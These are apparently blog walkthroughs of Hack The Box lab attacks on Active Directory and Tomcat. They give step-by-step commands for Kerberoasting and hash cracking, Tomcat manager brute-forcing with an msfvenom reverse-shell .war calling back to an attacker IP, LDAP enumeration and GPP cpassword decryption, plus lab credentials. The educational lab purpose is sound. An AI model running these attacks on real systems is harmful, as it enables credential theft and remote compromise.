Kerberoasting Stealing Service Account (SPN) – Remote

by Vry4n_ | May 31, 2021 | Windows Exploitation

Kerberos Workflow using Messages In the Active Directory domain, every domain controller runs a KDC (Kerberos Distribution Center) service that processes all requests for tickets to Kerberos. For Kerberos tickets, AD uses the KRBTGT account in the AD domain.

Service Principal Names

A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.

• If you install multiple instances of a service on computers throughout a forest, each instance must have its SPN.
• Before the Kerberos authentication service can use an SPN to authenticate a service, the SPN must be registered on the account.
• A given SPN can be registered on only one account.
• An SPN must be unique in the forest in which it is registered.
• If it is not unique, authentication will fail.

• Host-based SPNs which is associated with the computer account in AD, it is randomly generated 128-character long password which is changed every 30 days, hence it is no use in Kerberoasting attacks
• SPNs that have been associated with a domain user account where NTLM hash will be used

What is Kerberoasting?

Kerberoasting is a technique that allows an attacker to steal the KRB_TGS ticket, that is encrypted with RC4, to brute force application services hash to extract its password.

• Kerberos uses NTLM hash of the requested Service for encrypting KRB_TGS ticket for given service principal names (SPNs).
• When a domain user sent a request for TGS ticket to domain controller KDC for any service that has registered SPN, the KDC generates the KRB_TGS without identifying the user authorization against the requested service.

An attacker can use this ticket offline to brute force the password for the service account since the ticket has been encrypted in RC4 with the NTLM hash of the service account.

Concept behind

1. Having a low privilege user/password, the attacker scans Active Directory for user account with SPN values set

2. Once a list of users is obtained the attacker requests service tickets from AD using SPN values

3. Using some tools the attacker extracts the service tickets and saves the information.

4. Once, the tickets are saved in disk the attacker proceeds to crack it using scripts that will run a dictionary of passwords as NTLM hashes against the service tickets.

5. When the ticket is opened with a successful NTLM hash match the user real password is displayed.

Overall procedure #1

1: Discover or scan the registered SPN.

2: Request for TGS ticket for discovered SPN using Mimikatz or any other tool.

3: Dump the TGS ticket which may have extention .kirbi or ccache or service HASH (in some scenario)

4: Convert the .kirbi or ccache file into a crackable format Step 5: Use a dictionary for the brute force attack.

Overall procedure #2

1. Scan Active Directory for user accounts with SPN values set.

2. Request service tickets from AD using SPN values

3. Extract service tickets to memory and save to a file

4. Brute force attack those passwords offline until cracked

How to Exploit (Impaket)

1. We can also find out if the user we’ve been using is part of an Active Directory domain using Impaket GetADUsers.py

• python3.9 /opt/impacket/examples/GetADUsers.py -all active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100

Note: We see Administrator and SVC_TGS listed in there

2. Now request the TGS (ticket) from the users using Impaket GetUserSPNs.py

• python3.9 /opt/impacket/examples/GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

3. I will run the same command and I will save the output in a file named tgs.hash

• python3.9 /opt/impacket/examples/GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -output tgs.hash

4. (OPTIONAL). If you ever get a NAL). If you ever get a “Kerberos SessionERROR: KRB_AP_ERR_SKEW(Clock skew too great)”, then you need to sync the time with the AD server

• rdate -n 10.10.10.100

5. Now that we got the encrypted ticket we will proceed to crack it using john against the file we created tgs.hash

• john –wordlist=/usr/share/wordlists/rockyou.txt tgs.hash

Note: The password Is Ticketmaster1968

6. We can also crack the password using hashcat

• hashcat -m 13100 tgs.hash /usr/share/wordlists/rockyou.txt –force –potfile-disable

Detection and Mitigation of Kerberoasting Attacks

The best mitigation defenders have at their disposal against Kerberoasting is to enforce robust password policies for service accounts. Organizations should mandate long, complicated passwords (25 or more characters) that are changed frequently. Length and complexity frustrates offline cracking efforts. Frequent password rotation, say at 30-day intervals, narrows the window of time attackers have to crack long hashes for an indeterminate length of time.

Resources

https://stealthbits.com/blog/extracting-service-account-passwords-with-kerberoasting/

https://www.scip.ch/en/?labs.20181011

https://adsecurity.org/?p=2293

https://attack.stealthbits.com/cracking-kerberos-tgs-tickets-using-kerberoasting

https://adsecurity.org/?p=1508

https://www.qomplx.com/qomplx-knowledge-kerberoasting-attacks-explained/

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting

https://docs.microsoft.com/en-us/windows/win32/ad/service-principal-names#:~:text=A%20service%20principal%20name%20(SPN,not%20have%20the%20account%20name.

https://thebackroomtech.com/2018/08/21/explanation-of-service-principal-names-in-active-directory/

https://docs.microsoft.com/en-us/windows/win32/ad/name-formats-for-unique-spns

Apache Tomcat Manager .war reverse shell

by Vry4n_ | May 30, 2021 | Windows Exploitation

This time we will enumerate Apache Tomcat/7.0.88, brute force the login and upload a webshell. The most interesting path of Tomcat is /manager/html, inside that path you can upload and deploy war files (execute code). But this path is protected by basic TTP auth, the most common credentials are:

• admin:admin
• tomcat:tomcat
• admin:<NOTHING>
• admin:s3cr3t
• tomcat:s3cr3t
• admin:tomcat

Metasploit

1. Start Metasploit Framework

• sudo msfdb run

2. We will brute force using “auxiliary/scanner/http/tomcat_mgr_login”

• use auxiliary/scanner/http/tomcat_mgr_login
• show options

3. Set the remote host, and, run the module. If you need to use a different wordlist you can modify the USER_FILE & USERPASS_FILE variables. I’d use default. If the admin page uses other port than 8080 you should also change that.

• set RHOSTS 10.10.10.95
• exploit

NOTE: This user/pass files will test for default known passwords. We got a successful match (tomcat/s3cret)

4. Having the credentials now we can use “exploit/multi/http/tomcat_mgr_upload” to upload a web shell, and, get a connection back

• use exploit/multi/http/tomcat_mgr_upload
• show options

5. Set the RHOST, RPORT, URI, HttpPassword, HttpUsername & the listening interface LHOST

• set RHOSTS 10.10.10.95
• set RPORT 8080
• set HttpPassword s3cret
• set HttpUsername tomcat
• set LHOST 10.10.14.10
• exploit

6. We got a session, now inspect what user type you got, in this case we got nt authority\system

• sysinfo
• shell
• whoami

Hydra

1. You can also use hydra to brute force

• hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.10.10.95:8080/manager/html

Extra

1. We can manually create a MSFVenom payload and upload it ourselves. So, the first step is logging into the web console with the credentials we just got

• http://10.10.10.95:8080/manager/html
• tomcat/s3cret

2. Once logged in, scroll down to find “Deploy” section, this is the place where we will upload our web shell, using .war file

3. Create the .war payload using MSFvenom

• msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=9999 -f war -o rshell.war
• ls -l rshell.war

4. Start a Metasploit listener

• sudo msfdb run
• exploit/multi/handler
• show options

5. Set the payload and its options

• set payload java/jsp_shell_reverse_tcp
• set LHOST 10.10.14.10
• set LPORT 9999
• exploit

6. Now, upload the war file to the Apache Tomcat manager deploy section, then click deploy. The script will appear under application section in the same page

7. Click on it, and wait for the connection back

• whoami

Note: If by any chance the .war file displays a 404 code back. You can repeat the same steps, but, instead of uploading the .war file, from kali extract its contents and upload .jsp file

• unzip rshell.war

Recommendation

• Don’t run the application as nt authority\system
• Never use default credentials

Enumerating AD users with LDAP

by Vry4n_ | May 23, 2021 | Windows Exploitation

LDAP queries can be used to search for different objects (computers, users, groups) in the Active Directory LDAP database according to certain criteria.

This time, we will use LDAP to enumerate Active Directory users.

Search LDAP using ldapsearch

ldapsearch opens a connection to an LDAP server, binds, and performs a search using specified parameters. The filter should conform to the string representation for search filters as defined in RFC 4515. If not provided, the default filter, (objectClass=*), is used.

If ldapsearch finds one or more entries, the attributes specified by attrs are returned. If * is listed, all user attributes are returned. If + is listed, all operational attributes are returned. If no attrs are listed, all user attributes are returned. If only 1.1 is listed, no attributes will be returned.

By default, anonymous Lightweight Directory Access Protocol (LDAP) operations to Active Directory, other than rootDSE searches and binds, are not permitted.

https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled

This will only work if binding from the server is enabled.

ldapsearch how to (anonymous)

1. If your server is accepting anonymous authentication, you will be able to perform a LDAP search query without binding to the admin account. (the domain in this case is htb.local

• ldapsearch -x -h 10.10.10.161 -b “dc=htb,dc=local”

Note: This is the simplest form of output, so this will contain a whole to of information.

2. Finding all objects in the directory tree

• ldapsearch -x -b <search_base> -H <ldap_host> -D <bind_dn> -W “objectclass=*”
• ldapsearch -x -h 10.10.10.161 -b “dc=htb,dc=local” “objectclass=*”

3. Finding user accounts using ldapsearch

• ldapsearch -x -b <search_base> -H <ldap_host> -D <bind_dn> -W “objectclass=user”
• ldapsearch -x -h 10.10.10.161 -b “dc=htb,dc=local” “objectclass=user”

4. If you are only interested in some lines you can filter

• ldapsearch -x -b <search_base> -H <ldap_host> -D <bind_dn> -W “objectclass=account” cn uid homeDirectory
• ldapsearch -x -h 10.10.10.161 -b “dc=htb,dc=local” “objectclass=user” cn distinguishedName

5. Get possible usernames

• ldapsearch -x -h 10.10.10.161 -b “dc=htb,dc=local” “objectclass=user” sAMAccountName | grep sAMAccountName | awk -F “: ” ‘{print $2}’

ldapsearch how to (authenticated)

1. The easiest way to search LDAP is to use ldapsearch with the “-x” option for simple authentication and specify the search base with “-b”.

• ldapsearch -x -h 10.10.10.100 -p 389 -b “dc=active,dc=htb”

NOTE: If your server is accepting anonymous authentication, you will be able to perform a LDAP search query without binding to the admin account. In our case it needs authentication

2. Search LDAP with admin account (authenticated)

• ldapsearch -x -h 10.10.10.100 -p 389 -D SVC_TGS -w GPPstillStandingStrong2k18 -b “dc=active,dc=htb”

3. A number of UserAccountControl attributes have security relevance. The value of “2” corresponds to a disabled account status, and so the query below will return active users (by sAMAccountName / username) in the active.htb domain

• ldapsearch -x -h 10.10.10.100 -p 389 -D ‘SVC_TGS’ -w ‘GPPstillStandingStrong2k18’ -b “dc=active,dc=htb” -s sub “(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))” samaccountname | grep sAMAccountName

We got 2 users

• sAMAccountName: Administrator
• sAMAccountName: SVC_TGS

https://docs.microsoft.com/en-US/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties

Enumerate Users Impacket

1. Locate the script within your machine

• find / -iname GetADUsers.py 2> /dev/null

2. (Optional) If you don’t have it installed run

• sudo git clone https://github.com/SecureAuthCorp/impacket.git
• cd impacket/
• sudo pip3 install .
• sudo python3 setup.py install

3. Application help

• python3 /usr/share/doc/python3-impacket/examples/GetADUsers.py

4. Knowing a username and a password you can run consults to enumerate

• python3 /usr/share/doc/python3-impacket/examples/GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100

We got 2 interesting users Administrator & SVC_TGS

Resources

https://devconnected.com/how-to-search-ldap-using-ldapsearch-examples/

Exploiting GPP SYSVOL (Groups.xml)

by Vry4n_ | May 22, 2021 | Windows Exploitation

Group Policy Preferences (GPP) was introduced in Windows Server 2008, and among many other

features, allowed administrators to modify users and groups across their network.

Group Policy Preferences is a collection of Group Policy client-side extensions that deliver preference settings to domain-joined computers running Microsoft Windows desktop and server operating systems. Preference settings are administrative configuration choices deployed to desktops and servers. Preference settings differ from policy settings because users have a choice to alter the administrative configuration. Policy settings administratively enforce setting, which restricts user choice.

Prerequisite Fundamentals

Group Policy

Group Policy is a management technology included in Windows Server that enables you to secure computer and user settings.

SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. SYSVOL contains logon scripts, group policy data, and other domain-wide data which needs to be available anywhere there is a Domain Controller (since SYSVOL is automatically synchronized and shared among all Domain Controllers).

Group Policy object (GPO)

A Group Policy object (GPO) is a logical object composed of two components, a Group Policy container and a Group Policy template. Windows stores both of these objects on domain controllers in the domain. The Group Policy container object is stored in the domain partition of Active Directory.

Group Policy template

The Group Policy template is a collection of files and folders stored on the system volume (SYSVOL) of each domain controller in the domain. Windows copies the container and template to all domain controllers in a domain.

Source (https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v=ws.11))

All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

Groups.xml are found in the following directory \\IP-Address-of-the-DC\sysvol\NAME\Policies any domain user can access this directory, once you get creds go to it than do a search for groups.xml The important sections in the groups.xml file are the username and cpassword

• userName=”Administrator”
• cpassword=”DemoHashab+5T4cr1H4gFZvD9OWzDEMO23ab5abpL6D124″

The defined password was AES-256 encrypted and stored in Groups.xml. However, at some point in 2012 Microsoft published the AES key on MSDN, meaning that passwords set using GPP are now trivial to crack.

In this scenario we found a copy of SYSVOL in a share. We will mount the share find Groups.xml, extract the password, then, crack it

Inspect the share

1. Since we found a copy of sysvol in a share we will search for Groups.xml. First, list the shares then access the desired one

• smbclient -L //10.10.10.100
• smbclient //10.10.10.100/Replication

2. Set the following parameters

• RECURSE ON
• PROMPT OFF

3. Inspect the share

• ls
• cd active.htb
• ls
• cd Policies
• ls

4. Now download all the files.

• mget *

5. A new folder, named as the level you ran mget, will be created in your local computer

• cd active.htb
• find . -iname Groups.xml 2> /dev/null

6. Read the file and find name (user) & cpassword (password)

• cat ./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

7. In our case

name=”active.htb\SVC_TGS”

cpassword=”edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ”

8. Now the password needs to be cracked.

Cracking GPP using gpp-decrypt

1. Using the tool gpp-decrypt we can reverse the encryption/hashing of GPP passwords

• gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

2. So as per Groups xml and the result of gpp-decrypt we can say we have the following

• Domain user: active.htb\SVC_TGS
• Password: GPPstillStandingStrong2k18

Best Practices

XML Permission Denied Checks

• Place a new xml file in SYSVOL & set Everyone:Deny.
• Audit Access Denied errors.
• Sing the associated GPO doesn’t exist, there’s no legitimate reason for access.

Group Policy Preference Exploitation Mitigation:

• Install KB2962486 on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences.
• Delete existing GPP xml files in SYSVOL containing passwords.